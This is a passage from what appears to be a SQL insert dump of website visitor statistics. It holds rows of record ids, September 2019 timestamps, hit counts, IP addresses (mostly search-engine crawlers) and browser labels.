0,0,'5.45.207.19','other'),(450792,1569131769,1,1,0,0,'91.209.11.236','other'),(450793,1569132238,1,1,0,0,'95.108.213.4','other'),(450794,1569133089,2,2,0,0,'66.249.66.138','chrome'),(450795,1569133137,1,1,0,0,'157.55.39.53','other'),(450796,1569133239,1,1,0,0,'66.249.66.136','chrome'),(450797,1569133898,1,1,0,0,'40.77.167.8','other'),(450798,1569133976,1,1,0,0,'8.29.198.25','other'),(450799,1569133996,1,1,0,0,'157.55.39.189','other'),(450800,1569134309,1,1,0,0,'8.29.198.26','other'),(450801,1569134378,1,1,0,0,'40.77.167.112','other'),(450802,1569135034,1,1,0,0,'66.249.66.136','chrome'),(450803,1569135514,1,1,0,0,'40.77.167.8','other'),(450804,1569137682,1,1,0,0,'66.249.66.64','chrome'),(450805,1569138413,1,1,0,0,'66.249.66.138','chrome'),(450806,1569138701,1,1,0,0,'52.162.161.148','other'),(450807,1569139215,1,1,0,0,'141.8.188.29','other'),(450808,1569140726,1,1,0,0,'5.45.207.79','chrome'),(450809,1569141487,1,1,0,0,'157.55.39.197','other'),(450810,1569142584,1,1,0,0,'141.8.188.29','other'),(450811,1569144114,1,1,0,0,'95.108.213.8','chrome'),(450812,1569144375,76,76,0,0,'78.46.176.21','other'),(450813,1569144756,1,1,0,0,'66.249.66.138','chrome'),(450814,1569144814,1,1,0,0,'8.29.198.25','other'),(450815,1569145137,1,1,0,0,'8.29.198.27','other'),(450816,1569145279,1,1,0,0,'40.77.167.172','other'),(450817,1569145772,1,1,0,0,'157.55.39.189','other'),(450818,1569146367,25,25,0,0,'18.207.136.184','other'),(450819,1569146369,21,21,0,0,'89.163.146.232','other'),(450820,1569146650,2,2,0,0,'66.249.66.138','chrome'),(450821,1569147290,11,11,0,0,'18.207.136.184','other'),(450822,1569147431,1,1,0,0,'141.8.188.11','chrome'),(450823,1569147539,1,1,0,0,'66.249.66.134','chrome'),(450824,1569147678,1,1,0,0,'66.249.66.138','chrome'),(450825,1569147718,1,1,0,0,'178.158.248.67','chrome'),(450826,1569148105,1,1,0,0,'218.30.103.162','other'),(450827,1569148511,8,8,0,0,'18.207.136.184','other'),(450828,1569148582,2,2,0,0,'40.77.167.133','other'),(450829,1569148589,1,1,0,0,'157.55.39.189','other'),(450830,1569149487,13,13,0,0,'18.207.136.184','other'),(450831,1569150175,1,1,0,0,'141.8.188.29','other'),(450832,1569150402,1,1,0,0,'109.74.154.72','chrome'),(450833,1569151304,1,1,0,0,'66.249.66.138','chrome'),(450834,1569151391,1,1,0,0,'207.46.13.195','other'),(450835,1569151644,2,2,0,0,'40.77.167.216','other'),(450836,1569152467,1,1,0,0,'40.77.167.172','other'),(450837,1569153833,1,1,0,0,'40.77.167.172','other'),(450838,1569154568,1,1,0,0,'141.8.188.29','other'),(450839,1569155341,1,1,0,0,'207.46.13.194','other'),(450840,1569155653,1,1,0,0,'40.77.167.24','other'),(450841,1569155658,1,1,0,0,'8.29.198.26','other'),(450842,1569155981,1,1,0,0,'141.8.188.29','other'),(450843,1569155983,1,1,0,0,'8.29.198.25','other'),(450844,1569156572,1,1,0,0,'46.96.46.222','chrome'),(450845,1569156897,1,1,0,0,'40.77.167.69','other'),(450846,1569157203,2,2,0,0,'141.8.188.29','other'),(450847,1569157934,1,1,0,0,'141.8.188.11','other'),(450848,1569158805,1,1,0,0,'40.77.167.24','other'),(450849,1569160473,2,2,0,0,'40.77.167.24','other'),(450850,1569160831,1,1,0,0,'213.159.213.137','chrome'),(450851,1569162026,1,1,0,0,'82.145.211.60','other'),(450852,1569162501,1,1,0,0,'207.46.13.194','other'),(450853,1569162591,1,1,0,0,'5.45.207.79','other'),(450854,1569163181,2,2,0,0,'141.8.188.29','other'),(450855,1569163361,3,3,0,0,'34.67.148.173','chrome'),(450856,1569163388,5,5,0,0,'34.67.16.113','chrome'),(450857,1569163420,5,5,0,0,'34.67.104.254','chrome'),(450858,1569164131,1,1,0,0,'178.154.171.24','chrome'),(450859,1569164135,1,1,0,0,'178.154.171.27','chrome'),(450860,1569164637,1,1,0,0,'87.250.224.64','other'),(450861,1569164996,1,1,0,0,'40.77.167.24','other'),(450862,1569165848,1,1,0,0,'87.250.224.118','other'),(450863,1569166500,1,1,0,0,'8.29.198.27','other'),(450864,1569166811,1,1,0,0,'8.29.198.26','other'),(450865,1569166847,1,1,0,0,'207.46.13.194','other'),(450866,1569167282,1,1,0,0,'5.45.207.79','chrome'),(450867,1569167339,1,1,0,0,'141.8.188.11','chrome'),(450868,1569168166,2,2,0,0,'40.77.167.24','other'),(450869,1569169165,1,1,0,0,'46.211.103.78','chrome'),(450870,1569169634,1,1,0,0,'40.77.167.35','other'),(450871,1569169964,1,1,0,0,'66.249.66.136','chrome'),(450872,1569170454,1,1,0,0,'5.45.207.19','other'),(450873,1569170458,1,1,0,0,'87.250.224.47','other'),(450874,1569171328,1,1,0,0,'66.249.66.138','chrome'),(450875,1569171715,1,1,0,0,'207.46.13.195','other'),(450876,1569173141,1,1,0,0,'87.250.224.65','other'),(450877,1569174997,1,1,0,0,'91.196.178.67','firefox'),(450878,1569175260,1,1,0,0,'207.46.13.195','other'),(450879,1569175726,2,2,0,0,'60.191.38.77','firefox'),(450880,1569175816,1,1,0,0,'157.55.39.124','other'),(450881,1569175896,1,1,0,0,'40.77.167.35','other'),(450882,1569177348,1,1,0,0,'8.29.198.27','other'),(450883,1569177624,1,1,0,0,'141.8.142.108','other'),(450884,1569177651,1,1,0,0,'8.29.198.26','other'),(450885,1569178100,1,1,0,0,'66.249.66.138','chrome'),(450886,1569178936,1,1,0,0,'193.70.34.209','chrome'),(450887,1569179040,1,1,0,0,'37.9.113.103','other'),(450888,1569179315,2,2,0,0,'66.249.66.134','chrome'),(450889,1569179491,1,1,0,0,'66.249.66.136','chrome'),(450890,1569180406,1,1,0,0,'213.180.203.9','chrome'),(450891,1569181044,1,1,0,0,'40.77.167.35','other'),(450892,1569181122,1,1,0,0,'157.55.39.124','other'),(450893,1569181199,1,1,0,0,'141.8.188.29','other'),(450894,1569181342,1,1,0,0,'66.249.66.66','chrome'),(450895,1569181562,1,1,0,0,'157.55.39.102','other'),(450896,1569181780,1,1,0,0,'141.8.188.11','other'),(450897,1569182209,2,2,0,0,'66.249.66.138','chrome'),(450898,1569182969,1,1,0,0,'141.8.188.11','other'),(450899,1569182974,1,1,0,0,'141.8.188.29','other'),(450900,1569183010,1,1,0,0,'66.249.66.64','chrome'),(450901,1569184058,1,1,0,0,'95.28.88.131','msie'),(450902,1569184257,1,1,0,0,'66.249.66.134','chrome'),(450903,1569184536,1,1,0,0,'141.8.188.29','other'),(450904,1569184932,2,2,0,0,'66.249.66.136','chrome'),(450905,1569185562,1,1,0,0,'66.249.66.68','chrome'),(450906,1569185645,1,1,0,0,'157.55.39.124','other'),(450907,1569186157,1,1,0,0,'207.46.13.120','other'),(450908,1569187234,1,1,0,0,'66.249.66.136','chrome'),(450909,1569187481,2,2,0,0,'66.249.66.138','chrome'),(450910,1569187485,2,2,0,0,'66.249.66.134','chrome'),(450911,1569188209,1,1,0,0,'8.29.198.26','other'),(450912,1569188490,1,1,0,0,'8.29.198.27','other'),(450913,1569188790,1,1,0,0,'66.249.66.138','chrome'),(450914,1569189958,1,1,0,0,'207.46.13.64','other'),(450915,1569190759,1,1,0,0,'157.55.39.250','other'),(450916,1569190999,1,1,0,0,'207.46.13.64','other'),(450917,1569191002,1,1,0,0,'66.249.66.134','chrome'),(450918,1569191250,1,1,0,0,'66.249.66.68','chrome'),(450919,1569191602,1,1,0,0,'66.249.66.136','chrome'),(450920,1569192066,2,2,0,0,'141.8.188.29','other'),(450921,1569192189,1,1,0,0,'141.8.188.11','other'),(450922,1569192229,1,1,0,0,'207.46.13.120','other'),(450923,1569192276,1,1,0,0,'66.249.66.138','chrome'),(450924,1569193039,1,1,0,0,'66.249.66.66','chrome'),(450925,1569193370,1,1,0,0,'66.249.66.138','chrome'),(450926,1569193583,1,1,0,0,'141.8.188.29','other'),(450927,1569194248,1,1,0,0,'157.55.39.124','other'),(450928,1569194534,1,1,0,0,'46.211.109.233','chrome'),(450929,1569194668,2,2,0,0,'66.249.66.138','chrome'),(450930,1569194899,1,1,0,0,'207.46.13.64','other'),(450931,1569194902,1,1,0,0,'66.249.66.134','chrome'),(450932,1569195005,1,1,0,0,'157.55.39.250','other'),(450933,1569195890,2,2,0,0,'66.249.66.136','chrome'),(450934,1569197236,1,1,0,0,'5.45.207.19','other'),(450935,1569197818,3,3,0,0,'66.249.66.134','chrome'),(450936,1569199049,1,1,0,0,'8.29.198.26','other'),(450937,1569199333,1,1,0,0,'8.29.198.27','other'),(450938,1569199652,1,1,0,0,'207.46.13.120','other'),(450939,1569200278,1,1,0,0,'37.9.113.103','chrome'),(450940,1569200827,1,1,0,0,'66.249.66.134','chrome'),(450941,1569200979,1,1,0,0,'66.249.66.136','chrome'),(450942,1569201508,1,1,0,0,'207.46.13.120','other'),(450943,1569201800,1,1,0,0,'66.249.66.138','chrome'),(450944,1569202382,2,2,0,0,'141.8.188.29','other'),(450945,1569203131,1,1,0,0,'5.45.207.79','other'),(450946,1569203193,2,2,0,0,'157.55.39.250','other'),(450947,1569204072,2,2,0,0,'207.46.13.111','other'),(450948,1569204448,1,1,0,0,'66.249.66.134','chrome'),(450949,1569204600,1,1,0,0,'141.8.188.29','chrome'),(450950,1569204997,1,1,0,0,'40.77.167.97','other'),(450951,1569205124,1,1,0,0,'207.46.13.120','other'),(450952,1569205681,3,3,0,0,'66.249.66.136','chrome'),(450953,1569205906,1,1,0,0,'95.108.181.75','chrome'),(450954,1569206028,2,2,0,0,'5.45.207.79','other'),(450955,1569207201,1,1,0,0,'178.154.171.27','other'),(450956,1569207245,1,1,0,0,'66.249.66.136','chrome'),(450957,1569207467,1,1,0,0,'37.9.113.20','chrome'),(450958,1569208238,1,1,0,0,'40.77.167.97','other'),(450959,1569209122,1,1,0,0,'207.46.13.205','other'),(450960,1569209887,2,2,0,0,'8.29.198.26','other'),(450961,1569210066,1,1,0,0,'141.8.188.29','other'),(450962,1569210693,1,1,0,0,'40.77.167.97','other'),(450963,1569211326,1,1,0,0,'141.8.188.11','chrome'),(450964,1569211798,1,1,0,0,'66.249.66.136','chrome'),(450965,1569212625,1,1,0,0,'141.8.188.29','other'),(450966,1569212644,1,1,0,0,'5.45.207.79','chrome'),(450967,1569212655,1,1,0,0,'141.8.188.29','chrome'),(450968,1569213236,1,1,0,0,'207.46.13.205','other'),(450969,1569213403,1,1,0,0,'157.55.39.246','other'),(450970,1569213428,1,1,0,0,'207.46.13.111','other'),(450971,1569213776,1,1,0,0,'141.8.188.29','other'),(450972,1569213824,1,1,0,0,'141.8.188.29','chrome'),(450973,1569213884,1,1,0,0,'62.205.134.182','other'),(450974,1569214154,1,1,0,0,'66.249.66.66','chrome'),(450975,1569214331,1,1,0,0,'17.58.97.184','other'),(450976,1569214927,3,3,0,0,'207.46.13.183','other'),(450977,1569214936,1,1,0,0,'207.46.13.205','other'),(450978,1569215064,1,1,0,0,'37.57.218.190','firefox'),(450979,1569215217,1,1,0,0,'37.9.113.103','chrome'),(450980,1569215929,1,1,0,0,'66.249.66.138','chrome'),(450981,1569216272,1,1,0,0,'141.8.188.29','other'),(450982,1569216892,1,1,0,0,'66.249.66.138','chrome'),(450983,1569217707,1,1,0,0,'109.169.198.186','chrome'),(450984,1569217721,2,2,0,0,'207.46.13.111','other'),(450985,1569217918,1,1,0,0,'141.8.188.11','other'),(450986,1569219213,1,1,0,0,'141.8.188.29','chrome'),(450987,1569219226,1,1,0,0,'141.8.188.29','other'),(450988,1569219366,1,1,0,0,'40.77.167.72','other'),(450989,1569220725,1,1,0,0,'8.29.198.25','other'),(450990,1569221025,1,1,0,0,'8.29.198.27','other'),(450991,1569221727,1,1,0,0,'141.8.142.103','chrome'),(450992,1569221747,1,1,0,0,'141.8.188.11','other'),(450993,1569222039,1,1,0,0,'66.249.66.138','chrome'),(450994,1569222129,1,1,0,0,'40.77.167.72','other'),(450995,1569223501,2,2,0,0,'91.196.178.73','chrome'),(450996,1569223571,1,1,0,0,'66.249.66.138','chrome'),(450997,1569223648,1,1,0,0,'66.249.66.64','chrome'),(450998,1569223935,1,1,0,0,'66.249.66.134','chrome'),(450999,1569225582,1,1,0,0,'207.46.13.49','other'),(451000,1569226557,1,1,0,0,'66.249.66.136','chrome'),(451001,1569228282,1,1,0,0,'141.8.142.103','chrome'),(451002,1569228781,1,1,0,0,'66.249.66.136','chrome'),(451003,1569229091,1,1,0,0,'91.209.11.236','other'),(451004,1569229749,1,1,0,0,'207.46.13.49','other'),(451005,1569229762,1,1,0,0,'66.249.66.138','chrome'),(451006,1569229784,1,1,0,0,'66.249.66.136','chrome'),(451007,1569230090,1,1,0,0,'95.135.241.215','chrome'),(451008,1569230706,1,1,0,0,'141.8.188.29','other'),(451009,1569231526,2,2,0,0,'207.46.13.49','other'),(451010,1569231592,2,2,0,0,'8.29.198.26','other'),(451011,1569232064,1,1,0,0,'5.255.253.38','other'),(451012,1569232512,1,1,0,0,'91.196.178.70','chrome'),(451013,1569233076,1,1,0,0,'66.249.66.138','chrome'),(451014,1569233148,1,1,0,0,'66.249.66.64','chrome'),(451015,1569233260,1,1,0,0,'66.249.66.134','chrome'),(451016,1569233402,1,1,0,0,'5.45.207.79','other'),(451017,1569233746,1,1,0,0,'91.196.177.134','chrome'),(451018,1569235691,1,1,0,0,'37.9.113.148','other'),(451019,1569236690,1,1,0,0,'40.77.167.35','other'),(451020,1569236996,1,1,0,0,'207.46.13.123','other'),(451021,1569237436,1,1,0,0,'141.8.188.11','other'),(451022,1569237685,1,1,0,0,'40.77.167.35','other'),(451023,1569237794,1,1,0,0,'91.196.178.73','chrome'),(451024,1569238082,1,1,0,0,'141.8.188.11','chrome'),(451025,1569238324,3,3,0,0,'207.46.13.104','other'),(451026,1569238450,1,1,0,0,'157.55.39.122','other'),(451027,1569238566,1,1,0,0,'94.100.221.234','chrome'),(451028,1569239858,1,1,0,0,'109.74.154.72','chrome'),(451029,1569240314,1,1,0,0,'66.249.66.66','chrome'),(451030,1569240334,3,2,1,0,'66.249.66.136',''),(451031,1569240583,1,1,0,0,'66.249.66.136','chrome'),(451032,1569240766,1,1,0,0,'37.53.89.92','chrome'),(451033,1569241353,1,1,0,0,'91.196.178.73','chrome'),(451034,1569242456,2,2,0,0,'8.29.198.27','other'),(451035,1569242849,1,1,0,0,'91.196.178.186','chrome'),(451036,1569243089,1,1,0,0,'66.249.66.64','chrome'),(451037,1569243128,1,1,0,0,'66.249.66.136','chrome'),(451038,1569243753,1,1,0,0,'207.46.13.123','other'),(451039,1569244198,1,1,0,0,'37.57.218.190','firefox'),(451040,1569244205,2,2,0,0,'207.46.13.178','other'),(451041,1569244250,2,2,0,0,'66.249.66.134','chrome'),(451042,1569245772,1,1,0,0,'66.249.66.136','chrome'),(451043,1569245787,1,1,0,0,'66.249.66.134','chrome'),(451044,1569246041,1,1,0,0,'207.46.13.178','other'),(451045,1569246217,1,1,0,0,'66.249.66.138','chrome'),(451046,1569247651,1,1,0,0,'207.46.13.104','other'),(451047,1569249898,3,3,0,0,'34.67.185.76','chrome'),(451048,1569249949,3,3,0,0,'35.238.192.30','chrome'),(451049,1569249992,3,3,0,0,'35.232.98.205','chrome'),(451050,1569250019,3,3,0,0,'35.239.136.42','chrome'),(451051,1569250039,3,3,0,0,'104.198.137.141','chrome'),(451052,1569250054,3,3,0,0,'35.202.134.201','chrome'),(451053,1569253311,1,1,0,0,'8.29.198.25','other'),(451054,1569253589,1,1,0,0,'8.29.198.26','other'),(451055,1569254832,1,1,0,0,'141.8.188.29','chrome'),(451056,1569255065,1,1,0,0,'66.249.66.66','chrome'),(451057,1569255141,1,1,0,0,'66.249.66.134','chrome'),(451058,1569255385,2,2,0,0,'13.66.139.0','other'),(451059,1569255634,1,1,0,0,'207.46.13.104','other'),(451060,1569256105,1,1,0,0,'91.209.11.236','other'),(451061,1569257238,1,1,0,0,'95.216.14.217','chrome'),(451062,1569257653,1,1,0,0,'66.249.66.136','chrome'),(451063,1569258405,1,1,0,0,'87.250.224.81','other'),(451064,1569258876,1,1,0,0,'66.249.66.136','chrome'),(451065,1569259118,1,1,0,0,'178.154.200.48','other'),(451066,1569260092,1,1,0,0,'141.8.142.162','chrome'),(451067,1569260724,1,1,0,0,'66.249.66.134','chrome'),(451068,1569262344,1,1,0,0,'91.196.178.102','chrome'),(451069,1569262573,3,3,0,0,'66.249.66.136','chrome'),(451070,1569263145,1,1,0,0,'207.46.13.220','other'),(451071,1569263327,1,1,0,0,'207.46.13.55','other'),(451072,1569263424,1,1,0,0,'40.77.167.52','other'),(451073,1569263714,1,1,0,0,'91.196.178.35','chrome'),(451074,1569264176,1,1,0,0,'8.29.198.26','other'),(451075,1569264431,1,1,0,0,'8.29.198.27','other'),(451076,1569264660,2,2,0,0,'207.46.13.55','other'),(451077,1569265024,1,1,0,0,'91.196.178.89','chrome'),(451078,1569265703,1,1,0,0,'5.45.207.8','chrome'),(451079,1569266106,1,1,0,0,'40.77.167.52','other'),(451080,1569267336,1,1,0,0,'157.55.39.177','other'),(451081,1569267501,1,1,0,0,'37.9.113.13','other'),(451082,1569267608,1,1,0,0,'141.8.142.162','other'),(451083,1569267621,1,1,0,0,'141.8.188.49','other'),(451084,1569267934,1,1,0,0,'207.46.13.220','other'),(451085,1569268579,1,1,0,0,'69.171.251.34','other'),(451086,1569268999,1,1,0,0,'66.249.66.136','chrome'),(451087,1569269145,2,2,0,0,'207.46.13.220','other'),(451088,1569269383,2,2,0,0,'95.213.141.126','opera'),(451089,1569270038,3,3,0,0,'35.171.146.16','other'),(451090,1569271493,2,2,0,0,'207.46.13.220','other'),(451091,1569272208,2,2,0,0,'157.55.39.177','other'),(451092,1569272694,1,1,0,0,'95.108.213.8','other'),(451093,1569272702,1,1,0,0,'91.196.178.100','chrome'),(451094,1569272804,1,1,0,0,'207.46.13.83','other'),(451095,1569273883,1,1,0,0,'95.108.213.4','other'),(451096,1569274594,1,1,0,0,'66.249.66.64','chrome'),(451097,1569274596,2,2,0,0,'66.249.66.136','chrome'),(451098,1569274627,1,1,0,0,'95.108.181.75','other'),(451099,1569275029,1,1,0,0,'8.29.198.26','other'),(451100,1569275115,1,1,0,0,'66.249.66.138','chrome'),(451101,1569275287,1,1,0,0,'8.29.198.27','other'),(451102,1569275394,1,1,0,0,'207.46.13.83','other'),(451103,1569276457,1,1,0,0,'66.249.66.64','chrome'),(451104,1569276885,1,1,0,0,'66.249.66.66','chrome'),(451105,1569276904,1,1,0,0,'141.8.188.11','chrome'),(451106,1569277147,2,2,0,0,'66.249.66.136','chrome'),(451107,1569277383,1,1,0,0,'141.8.188.29','other'),(451108,1569277409,1,1,0,0,'13.66.139.0','other'),(451109,1569278240,1,1,0,0,'141.8.142.38','other'),(451110,1569278248,1,1,0,0,'178.154.171.60','other'),(451111,1569278338,1,1,0,0,'5.45.207.19','chrome'),(451112,1569278516,1,1,0,0,'207.46.13.55','other'),(451113,1569278789,2,2,0,0,'66.249.66.138','chrome'),(451114,1569279369,1,1,0,0,'5.45.207.79','chrome'),(451115,1569279682,1,1,0,0,'40.77.167.134','other'),(451116,1569281008,1,1,0,0,'66.249.66.134','chrome'),(451117,1569281789,1,1,0,0,'141.8.188.29','other'),(451118,1569282885,1,1,0,0,'66.249.66.66','chrome'),(451119,1569283009,1,1,0,0,'87.250.224.81','chrome'),(451120,1569283778,1,1,0,0,'207.46.13.55','other'),(451121,1569283954,2,2,0,0,'207.46.13.93','other'),(451122,1569284058,1,1,0,0,'157.55.39.177','other'),(451123,1569284696,1,1,0,0,'40.77.167.134','other'),(451124,1569284822,1,1,0,0,'141.8.188.29','other'),(451125,1569284959,1,1,0,0,'209.17.97.98','other'),(451126,1569285106,1,1,0,0,'176.110.134.2','chrome'),(451127,1569285289,1,1,0,0,'51.68.152.26','chrome'),(451128,1569285613,1,1,0,0,'157.55.39.71','other'),(451129,1569285855,1,1,0,0,'95.108.213.4','chrome'),(451130,1569285883,1,1,0,0,'8.29.198.25','other'),(451131,1569286143,1,1,0,0,'8.29.198.27','other'),(451132,1569286308,1,1,0,0,'207.46.13.93','other'),(451133,1569288150,1,1,0,0,'52.162.161.148','other'),(451134,1569288195,1,1,0,0,'207.46.13.102','other'),(451135,1569288476,2,2,0,0,'141.8.188.29','other'),(451136,1569288546,1,1,0,0,'5.45.207.79','other'),(451137,1569289549,2,2,0,0,'40.77.167.96','other'),(451138,1569289685,1,1,0,0,'141.8.188.11','chrome'),(451139,1569290678,3,3,0,0,'207.46.13.93','other'),(451140,1569290939,1,1,0,0,'66.249.66.136','chrome'),(451141,1569292044,2,2,0,0,'141.8.188.11','other'),(451142,1569292046,1,1,0,0,'207.46.13.93','other'),(451143,1569292512,2,2,0,0,'66.249.66.136','chrome'),(451144,1569292590,1,1,0,0,'66.249.66.64','chrome'),(451145,1569293575,1,1,0,0,'207.46.13.102','other'),(451146,1569293731,1,1,0,0,'66.249.66.66','chrome'),(451147,1569294373,1,1,0,0,'207.46.13.93','other'),(451148,1569294673,1,1,0,0,'141.8.188.11','other'),(451149,1569295745,2,2,0,0,'141.8.188.11','other'),(451150,1569295915,1,1,0,0,'141.8.188.29','other'),(451151,1569296629,1,1,0,0,'66.249.66.134','chrome'),(451152,1569296736,1,1,0,0,'8.29.198.26','other'),(451153,1569296858,2,2,0,0,'141.8.188.29','other'),(451154,1569296996,1,1,0,0,'8.29.198.25','other'),(451155,1569297698,1,1,0,0,'66.249.66.134','chrome'),(451156,1569298200,1,1,0,0,'66.249.66.136','chrome'),(451157,1569298866,1,1,0,0,'40.77.167.33','other'),(451158,1569299146,1,1,0,0,'141.8.188.29','other'),(451159,1569299190,1,1,0,0,'66.249.66.134','chrome'),(451160,1569299204,1,1,0,0,'66.249.66.68','chrome'),(451161,1569300154,1,1,0,0,'62.205.134.182','other'),(451162,1569300782,1,1,0,0,'141.8.188.29','other'),(451163,1569300822,1,1,0,0,'66.249.66.68','chrome'),(451164,1569301861,1,1,0,0,'207.46.13.48','other'),(451165,1569301950,1,1,0,0,'178.154.171.30','other'),(451166,1569302189,1,1,0,0,'119.192.195.83','msie'),(451167,1569302717,1,1,0,0,'78.111.190.242','chrome'),(451168,1569303056,2,2,0,0,'207.46.13.48','other'),(451169,1569303119,1,1,0,0,'66.249.66.134','chrome'),(451170,1569303286,1,1,0,0,'5.45.207.19','chrome'),(451171,1569303406,1,1,0,0,'5.45.207.79','chrome'),(451172,1569303420,1,1,0,0,'141.8.188.29','other'),(451173,1569304687,1,1,0,0,'207.46.13.220','other'),(451174,1569304710,1,1,0,0,'141.8.142.144','other'),(451175,1569305047,1,1,0,0,'141.8.188.29','other'),(451176,1569305193,1,1,0,0,'141.8.188.11','other'),(451177,1569305891,1,1,0,0,'207.46.13.220','other'),(451178,1569306657,1,1,0,0,'66.249.66.66','chrome'),(451179,1569306960,1,1,0,0,'5.188.84.125','chrome'),(451180,1569307241,1,1,0,0,'91.196.178.73','chrome'),(451181,1569307325,1,1,0,0,'141.8.188.11','chrome'),(451182,1569307608,1,1,0,0,'8.29.198.27','other'),(451183,1569307851,1,1,0,0,'8.29.198.26','other'),(451184,1569307860,1,1,0,0,'207.46.13.220','other'),(451185,1569308214,1,1,0,0,'66.249.66.66','chrome'),(451186,1569308654,1,1,0,0,'207.46.13.75','other'),(451187,1569309050,1,1,0,0,'95.108.213.4','other'),(451188,1569309062,1,0,1,0,'66.249.66.136',''),(451189,1569309868,1,1,0,0,'66.249.66.64','chrome'),(451190,1569309892,1,1,0,0,'46.201.117.53','chrome'),(451191,1569309916,1,1,0,0,'178.154.200.48','other'),(451192,1569310058,1,1,0,0,'40.77.167.63','other'),(451193,1569310121,1,1,0,0,'88.99.2.203','other'),(451194,1569310154,8,8,0,0,'136.243.70.68','other'),(451195,1569310735,1,1,0,0,'66.249.66.68','chrome'),(451196,1569310836,1,1,0,0,'77.74.177.113','chrome'),(451197,1569311089,1,1,0,0,'88.99.2.203','other'),(451198,1569311990,1,1,0,0,'88.99.2.203','other'),(451199,1569312385,1,1,0,0,'5.45.207.19','chrome'),(451200,1569312449,2,2,0,0,'87.250.224.65','chrome'),(451201,1569312613,1,1,0,0,'141.8.188.11','other'),(451202,1569312948,1,1,0,0,'88.99.2.203','other'),(451203,1569313444,1,1,0,0,'141.8.188.29','other'),(451204,1569313457,1,1,0,0,'66.249.66.66','chrome'),(451205,1569313634,3,3,0,0,'141.8.188.11','other'),(451206,1569313723,1,1,0,0,'5.45.207.79','other'),(451207,1569314244,1,1,0,0,'95.134.189.48','firefox'),(451208,1569314450,2,2,0,0,'66.249.66.136','chrome'),(451209,1569314628,2,2,0,0,'141.8.188.29','other'),(451210,1569315310,2,2,0,0,'66.249.66.134','chrome'),(451211,1569315914,1,1,0,0,'207.46.13.75','other'),(451212,1569315999,1,1,0,0,'207.46.13.220','other'),(451213,1569316017,3,3,0,0,'40.77.167.63','other'),(451214,1569316918,1,1,0,0,'91.196.178.73','chrome'),(451215,1569317236,1,1,0,0,'66.249.66.64','chrome'),(451216,1569317355,1,1,0,0,'66.249.66.138','chrome'),(451217,1569317557,1,1,0,0,'40.77.167.63','other'),(451218,1569317561,1,1,0,0,'207.46.13.48','other'),(451219,1569317567,1,1,0,0,'207.46.13.75','other'),(451220,1569317572,2,2,0,0,'207.46.13.220','other'),(451221,1569317739,1,1,0,0,'193.106.243.81','chrome'),(451222,1569317759,1,1,0,0,'66.249.66.68','chrome'),(451223,1569318458,1,1,0,0,'8.29.198.27','other'),(451224,1569318515,1,1,0,0,'109.74.154.72','chrome'),(451225,1569318629,1,1,0,0,'46.211.132.94','chrome'),(451226,1569318630,1,1,0,0,'66.249.88.186','chrome'),(451228,1569318632,1,1,0,0,'66.249.88.190','chrome'),(451229,1569318638,1,1,0,0,'66.249.83.200','chrome'),(451231,1569318716,1,1,0,0,'8.29.198.25','other'),(451232,1569318780,1,1,0,0,'91.234.199.54','chrome'),(451233,1569318861,2,2,0,0,'66.249.66.64','chrome'),(451234,1569318903,1,1,0,0,'141.8.188.11','other'),(451235,1569320960,1,1,0,0,'212.1.93.97','firefox'),(451236,1569321309,1,1,0,0,'141.8.188.11','other'),(451237,1569321347,1,1,0,0,'207.46.13.48','other'),(451238,1569322059,1,1,0,0,'141.8.188.29','other'),(451239,1569322181,1,1,0,0,'40.77.167.63','other'),(451240,1569322566,1,1,0,0,'40.77.167.176','other'),(451241,1569322981,1,1,0,0,'141.8.188.11','chrome'),(451242,1569323030,1,1,0,0,'128.71.123.192','chrome'),(451243,1569323981,1,1,0,0,'5.45.207.79','chrome'),(451244,1569324741,1,1,0,0,'157.55.39.209','other'),(451245,1569324756,1,1,0,0,'40.77.167.176','other'),(451246,1569325464,1,1,0,0,'66.249.66.64','chrome'),(451247,1569327470,1,1,0,0,'91.196.177.46','firefox'),(451248,1569328097,1,1,0,0,'141.8.188.11','other'),(451249,1569328789,1,1,0,0,'66.249.66.138','chrome'),(451250,1569328799,1,1,0,0,'66.249.66.136','chrome'),(451251,1569329184,1,1,0,0,'82.207.116.24','chrome'),(451252,1569329318,1,1,0,0,'8.29.198.26','other'),(451253,1569329393,1,1,0,0,'66.249.66.68','chrome'),(451254,1569329428,1,1,0,0,'66.249.66.134','chrome'),(451255,1569329523,1,1,0,0,'66.249.66.66','chrome'),(451256,1569329590,1,1,0,0,'8.29.198.25','other'),(451257,1569329914,1,1,0,0,'66.249.66.138','chrome'),(451258,1569331075,3,3,0,0,'66.249.66.138','chrome'),(451259,1569331103,1,1,0,0,'66.249.66.64','chrome'),(451260,1569331274,2,2,0,0,'141.8.188.29','other'),(451261,1569331684,1,1,0,0,'193.107.72.207','chrome'),(451262,1569331744,1,1,0,0,'66.249.66.68','chrome'),(451263,1569331935,3,3,0,0,'66.249.66.136','chrome'),(451264,1569332528,1,1,0,0,'5.45.207.79','chrome'),(451265,1569333062,3,3,0,0,'66.249.66.136','chrome'),(451266,1569333330,7,7,0,0,'66.249.66.134','chrome'),(451267,1569333725,3,3,0,0,'66.249.66.138','chrome'),(451268,1569334652,1,1,0,0,'66.249.66.134','chrome'),(451269,1569334737,1,1,0,0,'13.66.139.0','other'),(451270,1569334986,2,2,0,0,'66.249.66.136','chrome'),(451271,1569335042,2,2,0,0,'66.249.66.64','chrome'),(451272,1569335489,1,1,0,0,'66.249.66.138','chrome'),(451273,1569335511,1,1,0,0,'207.46.13.187','other'),(451274,1569336071,2,2,0,0,'66.249.66.136','chrome'),(451275,1569336074,2,2,0,0,'157.55.39.74','other'),(451276,1569336083,1,1,0,0,'66.249.66.134','chrome'),(451277,1569336449,3,3,0,0,'35.226.236.135','chrome'),(451278,1569336491,3,3,0,0,'66.249.66.138','chrome'),(451279,1569336536,3,3,0,0,'104.197.6.107','chrome'),(451280,1569336564,2,2,0,0,'104.154.137.42','chrome'),(451282,1569336576,2,2,0,0,'35.193.239.36','chrome'),(451284,1569336588,2,2,0,0,'35.239.231.130','chrome'),(451286,1569336594,3,3,0,0,'69.171.251.23','other'),(451288,1569336596,1,1,0,0,'69.171.251.39','other'),(451290,1569336603,2,2,0,0,'35.188.15.12','chrome'),(451292,1569336625,1,1,0,0,'69.171.251.27','other'),(451295,1569336626,1,1,0,0,'69.171.251.35','other'),(451296,1569337258,2,2,0,0,'66.249.66.136','chrome'),(451297,1569337339,3,3,0,0,'66.249.66.134','chrome'),(451298,1569337396,1,1,0,0,'66.249.66.138','chrome'),(451299,1569338336,1,1,0,0,'5.45.207.79','other'),(451300,1569338622,1,1,0,0,'66.249.66.136','chrome'),(451301,1569338651,1,1,0,0,'66.249.66.134','chrome'),(451302,1569339290,1,1,0,0,'91.196.178.75